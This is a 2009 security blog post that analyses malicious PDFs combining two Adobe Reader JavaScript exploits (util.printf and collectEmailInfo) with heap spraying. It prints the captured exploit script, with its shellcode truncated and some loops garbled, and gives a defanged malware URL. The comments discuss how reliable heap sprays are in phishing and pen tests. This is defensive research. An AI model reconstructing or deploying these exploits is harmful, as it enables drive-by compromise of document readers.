Monday, March 16, 2009

PDF Exploits now with Heapspray


So right after the latest Adobe 0-day was found in the wild and it was seen to be using heapspraying as part of the exploit and payload delivery I noticed a change in the other Abobe exploits doing the rounds. Both the Adobe printf() and collectEmailInfo() exploits are now taking advantage of heapspraying. I guess it makes sense considering that most, if not all, of the pdf exploits are being delivered via a link rather than an attachment. The browser will render the pdf within the window and so heapspraying will work nicely. This does limit it to IE though.

Another interesting change is that I'm seeing both exploit vectors in a single pdf. A quick visit to hxxp://skalty.com/qqa/paf.php returned a pdf with the following javascript:
----
function fix_it(yarsp, len)
{
while (yarsp.length*2
yarsp = yarsp.substring(0,len/2);
return yarsp;
}
var version = app.viewerVersion;
if (version > 8)
{
var payload = unescape("%u0A0A%u0A0A%u0A0A"+"%uE1D9%u34D9%u5824...snip...");
nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")
heapblock = nop + payload;
bigblock = unescape("%u0A0A%u0A0A");
headersize = 20;
spray = headersize+heapblock.length;
while (bigblock.length
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
while(block.length+spray < block ="" mem =" new" i="0;i<1400;i++)">
var num = 12999999999999999999888888...snip...;
util.printf("%45000f",num);
}
else
{
var addkk = unescape("%u0A0A%u0A0A%u0A0A"+"%uE1D9%u34D9....snip...");

var mem_array = new Array();
var cc = 0x0c0c0c0c;
var addr = 0x400000;
var sc_len = addkk.length * 2;
var len = addr - (sc_len+0x38);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 0x400000)/addr;

for (var count=0;countcount2;count++)
{
mem_array[count] = yarsp + addkk;
}
var overflow = unescape("%u0c0c%u0c0c");
while(overflow.length <>
this.collabStore = Collab.collectEmailInfo({subj: "",msg: overflow});
}
this.kasp]ac();
----
Nothing new really but it's always interesting to see how the exploits and their delivery mechanisms evolve.
dean de beer

2 comments:

Matthew Wollenweber said...

I'm generally pleased when malware uses heapsprays. I haven't had a chance to play with this particular exploit, but previous IE exploits relying on it tended to be unreliable. I've used a few of those during pen tests/targeted phishing. We also ran into the problem that people closed the browser because it froze while spraying the heap -- so the exploit became even less reliable.

Of note, the Immunity guys appear to have a reliable exploit without spraying. Again, I haven't seen their exploit but their strategy posted on DailyDave was to build a dictionary using Flash/Java and try to find a reliable memory address.

dean de beer said...

Most, if not all, of the exploits I've seen tend to use Skylined's technique as it's simple and works but it can be slow writing to the heap. A good thing I guess. I've found that if you spend a bit of time tweaking the block sizes you can find a good balance between stability and speed.

I've been looking at using Alex Sotirovs .NET DLL technique and porting some of my stuff to it. No luck yet though. :)